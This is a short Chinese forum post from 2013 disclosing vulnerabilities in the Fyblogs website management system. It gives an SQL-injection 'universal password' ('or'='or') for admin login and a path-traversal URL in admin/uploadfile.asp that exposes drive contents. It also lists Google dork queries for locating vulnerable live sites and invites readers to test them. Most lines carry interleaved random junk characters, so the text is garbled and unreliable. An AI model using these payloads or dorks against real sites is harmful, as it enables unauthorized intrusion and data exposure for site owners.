漏洞类型: 未授权访问/权限绕过8 `* A& B! h+ c/ ?# v+ L5 `
4 A" O& A$ q9 N- @+ [" O$ Q简要描述:2 E* E! {0 c) B
0 k* T6 N7 C+ W6 o& B6 @& A& ]Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!# Q* z* x# t$ i# i' [
) @8 B2 G' G. D: w" g
详细说明:4 F; c# Z |8 S# a0 N P' S
X' t, c, }( \* J8 v4 Y# }, x( E后台万能密码 'or'='or'% D3 P) {8 r$ U. M* J6 p; R/ t
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!; i( G8 [4 [: e: F0 W, T
admin/uploadfile.asp?currentFolder=/upfiles/../
/ O! Q$ ]% Z6 C; K. P6 G
: R/ e: v8 t1 }漏洞证明:6 I: T/ ^- F7 s/ y
! i. y9 M; R$ T+ N Z谷歌:inurl:type.asp?id=1 新闻中心& s% J2 L( ]+ z: l- a% b6 N, ^
或者 :inurl:download_ok.asp?
5 F9 e7 {8 [3 C0 a" v. D) J* ~1 x' ?& x3 i9 {
可以测试
7 ~# \: x b% G" Q1 f+ s% W, ` T' ~8 s7 Y1 b* g. s. l3 g8 s1 |
, [& G+ O! ^! L6 ~
|
发表于 2013-3-7 13:07:46
收藏
支持
反对